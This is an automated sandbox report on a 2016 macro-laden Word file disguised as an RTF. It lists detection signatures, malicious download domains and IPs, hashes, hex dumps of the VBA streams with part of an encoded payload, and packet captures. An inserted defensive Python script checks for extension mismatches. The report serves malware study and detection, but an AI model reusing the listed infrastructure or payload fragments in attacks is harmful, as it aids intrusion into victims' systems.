Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 15.0.0 |
Analysis ID: | 142902 |
Start time: | 16:15:12 |
Joe Sandbox Product: | Cloud |
Start date: | 07.07.2016 |
Overall analysis duration: | 0h 2m 48s |
Report type: | full |
Sample file name: | k-25ss9tv61sm78f_35s.rtf |
Cookbook file name: | Speed Time.jbs |
Analysis system description: | Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36) |
Number of new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Detection: | MAL |
Classification: | mal84.evad.expl.winRTF@6/10@2/3 |
Detection |
---|
Strategy | Score | Range |
---|---|---|
Threshold | 84 | 0 - 100 |
Classification |
---|
Analysis Advice |
---|
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook |
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
Signature Overview |
---|
Software Vulnerabilities: |
---|
Potential document exploit detected (performs DNS queries) |
Source: global traffic | DNS query: |
Potential document exploit detected (performs HTTP gets) |
Source: global traffic | TCP traffic: |
Potential document exploit detected (unknown TCP traffic) |
Source: global traffic | TCP traffic: |
Document exploit detected (process start blacklist hit) |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Networking: |
---|
Urls found in memory or binary data |
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: |
Source: image1.jpe | String found in binary or memory: |
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: |
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: |
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, core.xml, image1.jpe | String found in binary or memory: |
Source: core.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml, theme1.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: app.xml | String found in binary or memory: |
Source: app.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: core.xml | String found in binary or memory: |
Source: document.xml | String found in binary or memory: |
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: |
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: |
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: |
Source: core.xml | String found in binary or memory: |
Downloads files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Downloads files from webservers via HTTP |
Source: global traffic | HTTP traffic detected: |
Source: global traffic | HTTP traffic detected: |
Performs DNS lookups |
Source: unknown | DNS traffic detected: |
Tries to download non-existing http data (HTTP/1.1 404 Not Found) |
Source: global traffic | HTTP traffic detected: |
Uses a known web browser user agent for HTTP communication |
Source: global traffic | HTTP traffic detected: |
Source: global traffic | HTTP traffic detected: |
Potential malicious VBS script found (has network functionality) |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Persistence and Installation Behavior: |
---|
Command shell drops VBS files |
Source: C:\Windows\System32\cmd.exe | File created: |
Data Obfuscation: |
---|
Obfuscated document found, RTF is a DOCX |
Source: k-25ss9tv61sm78f_35s.rtf | Initial file: |
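The "RTF is a DOCX" signature above, together with the Static File Info entry "File type: Microsoft Word 2007+" for a file named .rtf, is the kind of mismatch a triage script should catch before the document is ever opened. The following is an added example (it is not part of the Joe Sandbox report and not a Joe Sandbox feature): it classifies a file by its container magic instead of its extension, and for an OOXML container lists the parts that hold a VBA project. The helper names and the in-memory ZIP sample are this example's own constructions; the vbaProject.bin part in the sample is a placeholder, not a real VBA project.

```python
"""Added example (not part of the Joe Sandbox report): flag a document whose
extension disagrees with its container format, as in the report's
"RTF is a DOCX" signature, and report whether an OOXML container carries a
VBA project. Sample inputs are constructed in memory."""
import io
import zipfile

RTF_MAGIC = b"{\\rtf"
ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def container_type(data: bytes) -> str:
    """Classify by magic bytes, ignoring the file name entirely."""
    if data.startswith(RTF_MAGIC):
        return "rtf"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"          # DOCX/DOCM/XLSX/PPTX are ZIP containers
    if data.startswith(OLE_MAGIC):
        return "ole"            # legacy .doc/.xls compound files (needs olefile to go deeper)
    return "unknown"


def ooxml_vba_parts(data: bytes) -> list:
    """Names of OOXML parts that hold VBA (vbaProject.bin); empty if none."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]


def assess(filename: str, data: bytes) -> dict:
    """Verdict: actual container, whether the extension lies about it,
    and which VBA parts are present (OOXML containers only)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = container_type(data)
    expected = {"rtf": "rtf", "docx": "ooxml", "docm": "ooxml",
                "doc": "ole", "xls": "ole"}.get(ext)
    mismatch = expected is not None and expected != actual
    vba = ooxml_vba_parts(data) if actual == "ooxml" else []
    return {"actual": actual, "extension_mismatch": mismatch, "vba_parts": vba}


def build_fake_docm_with_macros() -> bytes:
    """Constructed sample: a minimal OOXML ZIP with a vbaProject.bin part.
    The part contents are placeholders, not a real VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    # Mirrors the report's sample: .rtf name, ZIP (OOXML) content, VBA inside.
    print(assess("k-25ss9tv61sm78f_35s.rtf", build_fake_docm_with_macros()))
    # A genuine RTF header for comparison.
    print(assess("note.rtf", b"{\\rtf1\\ansi Hello}"))
```

Word selects the parser from the file contents, not the extension, so an OOXML container renamed to .rtf still opens as a normal macro-capable document; a mail gateway or endpoint rule that trusts the .rtf extension (RTF cannot carry VBA) is bypassed. Checking the magic bytes and the presence of vbaProject.bin is the cheap, offline test.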
System Summary: |
---|
Checks whether correct version of .NET is installed |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Executable creates window controls seldom found in malware |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Window found: |
Checks if Microsoft Office is installed |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File opened: |
Classification label |
Source: classification engine | Classification label: |
Creates files inside the user directory |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Creates temporary files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Executes visual basic scripts |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Reads ini files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Reads software policies |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Spawns processes |
Source: unknown | Process created: |
Source: unknown | Process created: |
Source: unknown | Process created: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Source: C:\Windows\System32\cmd.exe | Process created: |
Uses an in-process (OLE) Automation server |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Document contains embedded VBA macros |
Source: k-25ss9tv61sm78f_35s.rtf | OLE indicator, VBA macros: |
Document misses a certain OLE stream usually present in this Microsoft Office document type |
Source: k-25ss9tv61sm78f_35s.rtf | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Reads the hosts file |
Source: C:\Windows\System32\wscript.exe | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: |
Document contains an embedded VBA macro which may execute processes |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: |
Document contains an embedded VBA macro with suspicious strings |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: |
Very long command line found |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Source: C:\Windows\System32\cmd.exe | Process created: |
HIPS / PFW / Operating System Protection Evasion: |
---|
System process connects to network (likely due to code injection or exploit) |
Source: C:\Windows\System32\wscript.exe | Network Connect: |
Source: C:\Windows\System32\wscript.exe | Network Connect: |
Anti Debugging: |
---|
Creates guard pages, often used to prevent reverse engineering and debugging |
Source: C:\Windows\System32\cmd.exe | Memory protected: |
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) |
Source: C:\Windows\System32\wscript.exe | System information queried: |
Malware Analysis System Evasion: |
---|
Found a high number of Window / User specific system calls (may be a loop to detect user behavior) |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Window / User API: |
May sleep (evasive loops) to hinder dynamic analysis |
Source: C:\Windows\System32\wscript.exe TID: 1296 | Thread sleep time: |
Potential evasive VBS script found (sleep loop) |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messages (SetErrorMode) |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: |
Source: C:\Windows\System32\wscript.exe | Process information set: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Queries the volume information (name, serial number etc) of a device |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Yara Overview |
---|
No Yara matches |
---|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
Contacted Domains/Contacted IPs |
---|
Contacted Domains |
---|
Name | IP | Active |
---|---|---|
idmaison.net | 94.76.192.140 | true |
ecovalduloir.com | 109.237.253.100 | true |
Contacted IPs |
---|
IP | Country | ASN | ASN Name |
---|---|---|---|
8.8.8.8 | United States | 15169 | GoogleInc |
94.76.192.140 | United Kingdom | 29550 | SimplyTransitLtd |
109.237.253.100 | France | 16347 | ADISTASAS |
Static File Info |
---|
General | |
---|---|
File type: | Microsoft Word 2007+ |
File name: | k-25ss9tv61sm78f_35s.rtf |
File size: | 111687 |
MD5: | 58258b89e076c4d378436f3b03682402 |
SHA1: | 1f10ad2812c48ceb7d2d2235ea7964a4c7b9bd56 |
SHA256: | edd557fa4e85f7d5429d74b7708607e9bdb848d0a7f55bdad79b163642c44bf6 |
SHA512: | 0179e8dfdcde9b9e79a263549ec0579367312514d8a4eeef9adf2cb0b833d8a7c789dc1b9cc913e399442243c6717b166044e82ca5ac581a34d9ff8aa8f562d7 |
Static OLE Info |
---|
General | |
---|---|
Document Type: | OpenXML |
Number of OLE Files: | 1 |
OLE File |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 25519 |
---|
General | |
---|---|
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 25519 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / K . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 e4 0f 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff eb 0f 00 00 2f 4b 00 00 00 00 00 00 01 00 00 00 15 e3 ca e0 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA File Name: UserForm1.frm, Stream Size: 1157 |
---|
General | |
---|---|
Stream Path: | VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 1157 |
Data ASCII: | . . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . { > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 15 e3 7b 3e 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 484 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 484 |
Entropy: | 5.3272379526 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 F 1 6 5 7 C 5 - 2 1 D 0 - 4 9 D 7 - 9 B D D - 7 A A 3 E A 5 5 A 5 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 A 4 8 A 4 7 C E A 8 0 E A 8 0 E A 8 0 E A 8 0 " . . D P B = " 9 4 9 |
Data Raw: | 49 44 3d 22 7b 30 46 31 36 35 37 43 35 2d 32 31 44 30 2d 34 39 44 37 2d 39 42 44 44 2d 37 41 41 33 45 41 35 35 41 35 35 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.29226192431 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00 |
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 291 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 291 |
Entropy: | 4.60507024638 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 2 2 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 3 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
Stream Path: UserForm1/f, File Type: data, Stream Size: 131 |
---|
General | |
---|---|
Stream Path: | UserForm1/f |
File Type: | data |
Stream Size: | 131 |
Entropy: | 3.58523835821 |
Base64 Encoded: | False |
Data ASCII: | . . $ . . . . . . . . . . . . . . . . . . } . . t . . 9 . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . > . . . . . . L a b e l 1 . . . . . . . . . . |
Data Raw: | 00 04 24 00 08 0c 10 0c 01 00 00 00 ff ff 00 00 01 00 00 00 00 7d 00 00 74 20 00 00 39 16 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 a4 3e 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 00 00 00 00 00 |
Stream Path: UserForm1/o, File Type: data, Stream Size: 16036 |
---|
General | |
---|---|
Stream Path: | UserForm1/o |
File Type: | data |
Stream Size: | 16036 |
Entropy: | 3.15372473478 |
Base64 Encoded: | False |
Data ASCII: | . . . > ( . . . q > . . 6 7 , 6 9 , 3 3 , 2 2 8 , 2 3 2 , 1 4 1 , 2 5 4 , 2 2 , 8 3 , 2 3 0 , 9 1 , 8 7 , 2 0 1 , 1 6 , 9 8 , 4 6 , 1 7 7 , 1 4 6 , 9 7 , 3 6 , 1 5 8 , 6 6 , 1 6 5 , 1 7 4 , 1 0 8 , 2 0 9 , 1 0 6 , 4 1 , 1 5 9 , 1 4 7 , 2 1 , 6 0 , 6 9 , 1 6 , 5 0 , 1 0 3 , 7 1 , 4 4 , 5 , 9 , 1 5 , 1 3 4 , 2 0 0 , 7 5 , 2 5 4 , 1 1 6 , 3 9 , 1 9 4 , 2 1 9 , 1 3 5 , 4 9 , 6 6 , 2 5 3 , 2 3 , 2 3 2 , 2 0 0 , 2 1 2 , 1 2 1 , 1 3 8 , 2 0 6 , 1 6 5 , 6 1 , 1 1 8 , 8 7 , 2 0 0 , 1 2 1 , 1 5 2 , 4 4 , 1 0 6 , 2 3 |
Data Raw: | 00 02 84 3e 28 00 00 00 71 3e 00 80 36 37 2c 36 39 2c 33 33 2c 32 32 38 2c 32 33 32 2c 31 34 31 2c 32 35 34 2c 32 32 2c 38 33 2c 32 33 30 2c 39 31 2c 38 37 2c 32 30 31 2c 31 36 2c 39 38 2c 34 36 2c 31 37 37 2c 31 34 36 2c 39 37 2c 33 36 2c 31 35 38 2c 36 36 2c 31 36 35 2c 31 37 34 2c 31 30 38 2c 32 30 39 2c 31 30 36 2c 34 31 2c 31 35 39 2c 31 34 37 2c 32 31 2c 36 30 2c 36 39 2c 31 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3840 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3840 |
Entropy: | 4.75359525678 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . |
Data Raw: | cc 61 af 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 779 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | VAX-order 68K Blit (standalone) executable (libmagic false match: VBA/dir is the MS-OVBA compressed project directory stream, not an executable) |
Stream Size: | 779 |
Entropy: | 6.43801953066 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . ; Y . . . . J . < . . . . . r s t d o l e > . . . s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . E O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B |
Data Raw: | 01 07 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 d4 fa 3b 59 81 10 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 20 6f 6c 65 3e 00 01 19 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 |
Network Behavior |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 7, 2016 16:16:26.570415020 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
Jul 7, 2016 16:16:26.570450068 CEST | 80 | 49224 | 109.237.253.100 | 192.168.1.15 |
Jul 7, 2016 16:16:26.570513010 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
Jul 7, 2016 16:16:26.571135044 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
Jul 7, 2016 16:16:26.571158886 CEST | 80 | 49224 | 109.237.253.100 | 192.168.1.15 |
Jul 7, 2016 16:16:26.696515083 CEST | 80 | 49224 | 109.237.253.100 | 192.168.1.15 |
Jul 7, 2016 16:16:26.696780920 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
Jul 7, 2016 16:16:26.851953030 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.852011919 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:26.852132082 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.852958918 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.852993011 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:26.992307901 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:26.992357969 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:26.992440939 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.992680073 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.992702961 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:27.286700964 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 7, 2016 16:16:25.611778975 CEST | 49276 | 53 | 192.168.1.15 | 8.8.8.8 |
Jul 7, 2016 16:16:26.538923025 CEST | 53 | 49276 | 8.8.8.8 | 192.168.1.15 |
Jul 7, 2016 16:16:26.772088051 CEST | 53996 | 53 | 192.168.1.15 | 8.8.8.8 |
Jul 7, 2016 16:16:26.850214005 CEST | 53 | 53996 | 8.8.8.8 | 192.168.1.15 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jul 7, 2016 16:16:25.611778975 CEST | 192.168.1.15 | 8.8.8.8 | 0x674b | Standard query (0) | ecovalduloir.com | A (IP address) | IN (0x0001) |
Jul 7, 2016 16:16:26.772088051 CEST | 192.168.1.15 | 8.8.8.8 | 0x901d | Standard query (0) | idmaison.net | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jul 7, 2016 16:16:26.538923025 CEST | 8.8.8.8 | 192.168.1.15 | 0x674b | No error (0) | ecovalduloir.com | | 109.237.253.100 | A (IP address) | IN (0x0001) |
Jul 7, 2016 16:16:26.850214005 CEST | 8.8.8.8 | 192.168.1.15 | 0x901d | No error (0) | idmaison.net | | 94.76.192.140 | A (IP address) | IN (0x0001) |
